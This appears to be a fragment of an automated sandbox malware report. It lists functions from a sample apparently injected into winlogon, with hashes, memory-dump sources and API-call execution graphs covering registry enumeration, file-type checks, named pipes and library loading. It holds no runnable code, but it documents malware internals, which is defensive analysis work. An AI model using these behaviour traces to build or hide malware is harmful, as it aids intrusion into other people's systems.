                                                        • Instruction Fuzzy Hash: 6471F63A20CFA166E7269FED98483EA7794F389B86F648066DD0B53B89DE35C541C700
                                                        Function 00000225DC619E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 1c103488b81b5755e9a858689f9c8f9220dbcbf2f2fcf3c8ea21b2028d61d58d
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: C5619D3B602F549AEB20CFA9D44439D7BA0F748B8EF148215EF4917B99DB38D156C700
                                                        Function 00000225DC679E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 9fd3008523d1d31d7ee32bda0e514125121f93270c61e4c83d0e3fe2aa1cbd72
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 4B61AB3B600F949AEB20DFA9D44439D77A0F748B8DF148A15EF4917B99DB38D496C700
                                                        Function 00000225DC6A2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a83db0d25de40b44f666c5a5d64bcfc4ffcb5cd7079b315c16954b0aa5d8d6a1
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 0F516B3A284FA1A5F63ADFADE09C3BAA751F785B41F648125CE4D83B49CE39C544C740
                                                        Function 00000225DC642330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 46897ffc2cc2630562e995aa3ab88a20c60a5fe9943d3a7bd5f75d2a5dc7dda7
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 8051273A60CFA1A1E6799FEDE05C37A7B51F784B41F648165CE4B03B49CA39C544C740
                                                        Function 00000225DC6B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 2b7cbdf29e740ea36268c330b496c3bcbbcaca586992bcfa57e7be5236719281
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: F0412A76314F90A2EB21DFA9E8483A977A1F398796F508021EE4D87794EF3CC445C740
                                                        Function 00000225DC6526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: ff598f2dff618ae855125180d135eff0feb50115b417593be16094bb43c2f728
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: BC41C476325E90A6DB21CFA9E8483AE77A0F798795F508021EE4E87794EB7CC445C740
                                                        Function 00000225DC6A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: c91e1e86bab824f286d7942031cacff95a827eda15b7eec0a60a9f277f66f1ea
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 54112B3A218F9092EB65CB59E44435977E5FB88B99F688220EF8C47768DF3CC552CB00
                                                        Function 00000225DC6494A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 8e6f9ddc8bd4a0050d82363797f3a651ef4e3f91162d625b6a7f86f7e5c4113b
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: CF115B36218F9092EB608B59E40435977E4FB88B99F288260EF8D47B68DF3CC552CB00
                                                        Function 00000225DC617356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 40d697394cd767119a46280874914b4daa5d8e9346db535fcc515f98333aa0ca
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 7EE08661A41F84A0DF118F66E8442D873A0DB58B69B48D122995C46311FA38D1E9C300
                                                        Function 00000225DC677356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 3bdf3a98a46eddaab18917913d4673d13906e839a3b4fd0dcf7fe39589f613a6
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: B2E08661640F84A0EF018F65E8442D833A0DB5CB65B49D122995C06351FA38D1E9C301
                                                        Function 00000225DC6173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 33387b3a89b0f7cf97b4c9f63ea1e6ce0b438a2dcf969175634c70bf0c094b31
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: F9E0CD61A01F44D0DF118F65D4441D87360E75CB69F88D222CD4C47311FB38D1E5C300
                                                        Function 00000225DC6773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 5795fbfa8a47514ff8c6ddda118d1662a7868f1be9d24305db9b02968eedc405
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 28E08661640F8490EF018F65D4401987360EB5CB55B88D122C95C06351FA38D1E5C301
                                                        Function 00000225DC6A1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 1420031e885aaf21fcc6fdccc82258bc3790c71e1673b6532d453dab14891ff2
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 95115129601F64E2EA54DFAEA44C22977A5FB89FC2F188025DE4E97765DF38C442C300
                                                        Function 00000225DC641BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 435233d5cd765dd7833698f1ddb9f59ae8d1156237805913c2fcddc5f4e0a6b6
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: B2119129615F5492EB54DFAEA80C26973A1FB89FC2F188065DE4E53765DF38C442C300
                                                        Function 00000225DC6A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 5f6bbecbb8621be69b39046fe70b37093b4047639506c31062e86b7116282652
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 3EE03239A01E1486EB088BAAD80834A36E2EB89B07F08C0248A0907361DF7DC499CB90
                                                        Function 00000225DC641268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 46137aeb2ac080d4014b8e101a3abee4704eba82c5d2520b876412a79b8151bf
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 77E06D39621E1486EB548FEAD80C36A36E1FB89F06F14C024CA0907751DF7DC499C750

                                                        Executed Functions

                                                        Function 00007FF67BA51140 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1885163966.00007FF67BA51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF67BA50000, based on PE: true
                                                        • Associated: 00000019.00000002.1885071807.00007FF67BA50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000019.00000002.1885260809.00007FF67BA5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000019.00000002.1885382420.00007FF67BA5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000019.00000002.1893002919.00007FF67BCE2000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000019.00000002.1893730831.00007FF67BF58000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000019.00000002.1893787160.00007FF67BF90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000019.00000002.1893823832.00007FF67BF93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_7ff67ba50000_wepulfrfkvoz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                        • Instruction ID: 585d77443b7e26a89f5b82c9ab1aea43b041ab92620849b898c4551422317c25
                                                        • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                        • Instruction Fuzzy Hash: 28B0923292430984E2003F11D8812692260AF0C741F800021E50C42366CE6D51804B24

                                                        Execution Graph

                                                        Execution Coverage:1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:261
                                                        Total number of Limit Nodes:15
                                                        execution_graph 14836 202c0ab273c 14839 202c0ab276a 14836->14839 14837 202c0ab28d4 14838 202c0ab2858 LoadLibraryA 14838->14839 14839->14837 14839->14838 14840 202c0ae202c 14841 202c0ae205d 14840->14841 14842 202c0ae2173 14841->14842 14849 202c0ae2081 14841->14849 14853 202c0ae213e 14841->14853 14843 202c0ae2178 14842->14843 14844 202c0ae21e7 14842->14844 14861 202c0ae2f04 GetProcessHeap HeapAlloc 14843->14861 14845 202c0ae21ec 14844->14845 14844->14853 14848 202c0ae2f04 11 API calls 14845->14848 14847 202c0ae20b9 StrCmpNIW 14847->14849 14851 202c0ae2190 14848->14851 14849->14847 14852 202c0ae20e0 14849->14852 14849->14853 14851->14853 14852->14849 14854 202c0ae1bf4 14852->14854 14855 202c0ae1c8f 14854->14855 14856 202c0ae1c1b GetProcessHeap HeapAlloc 14854->14856 14855->14852 14856->14855 14857 202c0ae1c56 14856->14857 14858 202c0ae1c77 GetProcessHeap HeapFree 14857->14858 14867 202c0ae152c 14857->14867 14858->14855 14866 202c0ae2f57 14861->14866 14862 202c0ae3015 GetProcessHeap HeapFree 14862->14851 14863 202c0ae3010 14863->14862 14864 202c0ae2fa2 StrCmpNIW 14864->14866 14865 202c0ae1bf4 6 API calls 14865->14866 14866->14862 14866->14863 14866->14864 14866->14865 14868 202c0ae1546 14867->14868 14871 202c0ae157c 14867->14871 14869 202c0ae155d StrCmpIW 14868->14869 14870 202c0ae1565 StrCmpW 14868->14870 14868->14871 14869->14868 14870->14868 14871->14858 14872 202c0ae1abc 14877 202c0ae1628 GetProcessHeap HeapAlloc 14872->14877 14874 202c0ae1ad2 Sleep SleepEx 14875 202c0ae1acb 14874->14875 14875->14874 14876 202c0ae1598 StrCmpIW StrCmpW 14875->14876 14876->14875 14921 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14877->14921 14879 202c0ae1650 14922 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14879->14922 14881 202c0ae1661 14923 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14881->14923 14883 202c0ae166a 14924 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14883->14924 14885 202c0ae1673 14886 202c0ae168e RegOpenKeyExW 14885->14886 14887 202c0ae16c0 RegOpenKeyExW 14886->14887 14888 202c0ae18a6 14886->14888 14889 202c0ae16ff RegOpenKeyExW 14887->14889 14890 202c0ae16e9 14887->14890 14888->14875 14892 202c0ae173a RegOpenKeyExW 14889->14892 14893 202c0ae1723 14889->14893 14925 202c0ae12bc RegQueryInfoKeyW 14890->14925 14894 202c0ae175e 14892->14894 14895 202c0ae1775 RegOpenKeyExW 14892->14895 14934 202c0ae104c RegQueryInfoKeyW 14893->14934 14899 202c0ae12bc 16 API calls 14894->14899 14900 202c0ae17b0 RegOpenKeyExW 14895->14900 14901 202c0ae1799 14895->14901 14902 202c0ae176b RegCloseKey 14899->14902 14904 202c0ae17eb RegOpenKeyExW 14900->14904 14905 202c0ae17d4 14900->14905 14903 202c0ae12bc 16 API calls 14901->14903 14902->14895 14906 202c0ae17a6 RegCloseKey 14903->14906 14908 202c0ae180f 14904->14908 14909 202c0ae1826 RegOpenKeyExW 14904->14909 14907 202c0ae12bc 16 API calls 14905->14907 14906->14900 14912 202c0ae17e1 RegCloseKey 14907->14912 14913 202c0ae104c 6 API calls 14908->14913 14910 202c0ae1861 RegOpenKeyExW 14909->14910 14911 202c0ae184a 14909->14911 14916 202c0ae189c RegCloseKey 14910->14916 14917 202c0ae1885 14910->14917 14915 202c0ae104c 6 API calls 14911->14915 14912->14904 14914 202c0ae181c RegCloseKey 14913->14914 14914->14909 14918 202c0ae1857 RegCloseKey 14915->14918 14916->14888 14919 202c0ae104c 6 API calls 14917->14919 14918->14910 14920 202c0ae1892 RegCloseKey 14919->14920 14920->14916 14921->14879 14922->14881 14923->14883 14924->14885 14926 202c0ae148a RegCloseKey 14925->14926 14927 202c0ae1327 GetProcessHeap HeapAlloc 14925->14927 14926->14889 14928 202c0ae1476 GetProcessHeap HeapFree 14927->14928 14929 202c0ae1352 RegEnumValueW 14927->14929 14928->14926 14930 202c0ae13a5 14929->14930 14930->14928 14930->14929 14931 202c0ae152c 2 API calls 14930->14931 14932 202c0ae141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14930->14932 14933 202c0ae13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14930->14933 14931->14930 14932->14930 14933->14932 14935 202c0ae10bf 14934->14935 14936 202c0ae11b5 RegCloseKey 14934->14936 14935->14936 14937 202c0ae10cf RegEnumValueW 14935->14937 14938 202c0ae114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14935->14938 14936->14892 14937->14935 14938->14935 14939 202c0ae253c 14941 202c0ae25bb 14939->14941 14940 202c0ae27aa 14941->14940 14942 202c0ae261d GetFileType 14941->14942 14943 202c0ae2641 14942->14943 14944 202c0ae262b StrCpyW 14942->14944 14955 202c0ae1a40 GetFinalPathNameByHandleW 14943->14955 14945 202c0ae2650 14944->14945 14949 202c0ae265a 14945->14949 14953 202c0ae26ff 14945->14953 14948 202c0ae3844 StrCmpNIW 14948->14953 14949->14940 14960 202c0ae3844 14949->14960 14963 202c0ae3044 StrCmpIW 14949->14963 14967 202c0ae1cac 14949->14967 14952 202c0ae3044 4 API calls 14952->14953 14953->14940 14953->14948 14953->14952 14954 202c0ae1cac 2 API calls 14953->14954 14954->14953 14956 202c0ae1a6a StrCmpNIW 14955->14956 14957 202c0ae1aa9 14955->14957 14956->14957 14958 202c0ae1a84 lstrlenW 14956->14958 14957->14945 14958->14957 14959 202c0ae1a96 StrCpyW 14958->14959 14959->14957 14961 202c0ae3851 StrCmpNIW 14960->14961 14962 202c0ae3866 14960->14962 14961->14962 14962->14949 14964 202c0ae308d PathCombineW 14963->14964 14965 202c0ae3076 StrCpyW StrCatW 14963->14965 14966 202c0ae3096 14964->14966 14965->14966 14966->14949 14968 202c0ae1ccc 14967->14968 14969 202c0ae1cc3 14967->14969 14968->14949 14970 202c0ae152c 2 API calls 14969->14970 14970->14968 14971 202c0aed6cc 14972 202c0aed6dd _invalid_parameter_noinfo 14971->14972 14973 202c0aed72e 14972->14973 14974 202c0aed712 HeapAlloc 14972->14974 14977 202c0aed6ac 14973->14977 14974->14972 14976 202c0aed72c 14974->14976 14980 202c0aecfa0 14977->14980 14979 202c0aed6b5 14979->14976 14983 202c0aecfb5 Concurrency::details::SchedulerProxy::DeleteThis 14980->14983 14981 202c0aecfe1 FlsSetValue 14982 202c0aecff3 14981->14982 14986 202c0aecfd1 _invalid_parameter_noinfo 14981->14986 14996 202c0aed6cc 14982->14996 14983->14981 14983->14986 14986->14979 14987 202c0aed020 FlsSetValue 14990 202c0aed03e 14987->14990 14991 202c0aed02c FlsSetValue 14987->14991 14988 202c0aed010 FlsSetValue 14989 202c0aed019 14988->14989 15002 202c0aed744 14989->15002 15007 202c0aecb94 14990->15007 14991->14989 14995 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 14995->14986 14997 202c0aed6dd _invalid_parameter_noinfo 14996->14997 14998 202c0aed72e 14997->14998 14999 202c0aed712 HeapAlloc 14997->14999 15000 202c0aed6ac Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14998->15000 14999->14997 15001 202c0aed002 14999->15001 15000->15001 15001->14987 15001->14988 15003 202c0aed77a 15002->15003 15004 202c0aed749 HeapFree 15002->15004 15003->14986 15004->15003 15005 202c0aed764 Concurrency::details::SchedulerProxy::DeleteThis 15004->15005 15006 202c0aed6ac Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15005->15006 15006->15003 15008 202c0aecc46 _invalid_parameter_noinfo 15007->15008 15011 202c0aecaec 15008->15011 15010 202c0aecc5b 15010->14995 15012 202c0aecb08 15011->15012 15015 202c0aecd7c 15012->15015 15014 202c0aecb1e 15014->15010 15016 202c0aecdc4 Concurrency::details::SchedulerProxy::DeleteThis 15015->15016 15017 202c0aecd98 Concurrency::details::SchedulerProxy::DeleteThis 15015->15017 15016->15014 15017->15016 15019 202c0af07b4 15017->15019 15020 202c0af0850 15019->15020 15024 202c0af07d7 15019->15024 15021 202c0af08a3 15020->15021 15023 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15020->15023 15085 202c0af0954 15021->15085 15026 202c0af0874 15023->15026 15024->15020 15025 202c0af0816 15024->15025 15030 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15024->15030 15028 202c0af0838 15025->15028 15035 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15025->15035 15027 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15026->15027 15031 202c0af0888 15027->15031 15029 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15028->15029 15032 202c0af0844 15029->15032 15033 202c0af080a 15030->15033 15034 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15031->15034 15037 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15032->15037 15045 202c0af2fc8 15033->15045 15040 202c0af0897 15034->15040 15041 202c0af082c 15035->15041 15036 202c0af090e 15037->15020 15038 202c0aed744 6 API calls Concurrency::details::SchedulerProxy::DeleteThis 15043 202c0af08af 15038->15043 15044 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15040->15044 15073 202c0af30d4 15041->15073 15043->15036 15043->15038 15044->15021 15046 202c0af2fd1 15045->15046 15071 202c0af30cc 15045->15071 15047 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15046->15047 15048 202c0af2feb 15046->15048 15047->15048 15050 202c0af2ffd 15048->15050 15051 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15048->15051 15049 202c0af300f 15053 202c0af3021 15049->15053 15054 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15049->15054 15050->15049 15052 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15050->15052 15051->15050 15052->15049 15055 202c0af3033 15053->15055 15056 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15053->15056 15054->15053 15057 202c0af3045 15055->15057 15058 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15055->15058 15056->15055 15059 202c0af3057 15057->15059 15061 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15057->15061 15058->15057 15060 202c0af3069 15059->15060 15062 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15059->15062 15063 202c0af307b 15060->15063 15064 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15060->15064 15061->15059 15062->15060 15065 202c0af308d 15063->15065 15066 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 